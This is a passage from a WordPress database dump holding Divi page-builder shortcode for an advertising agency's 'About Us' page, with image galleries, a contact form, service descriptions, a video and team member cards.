width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 19:25:23','2020-08-07 19:25:23','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(555,1,'2020-08-07 19:25:41','2020-08-07 19:25:41','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||60px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" 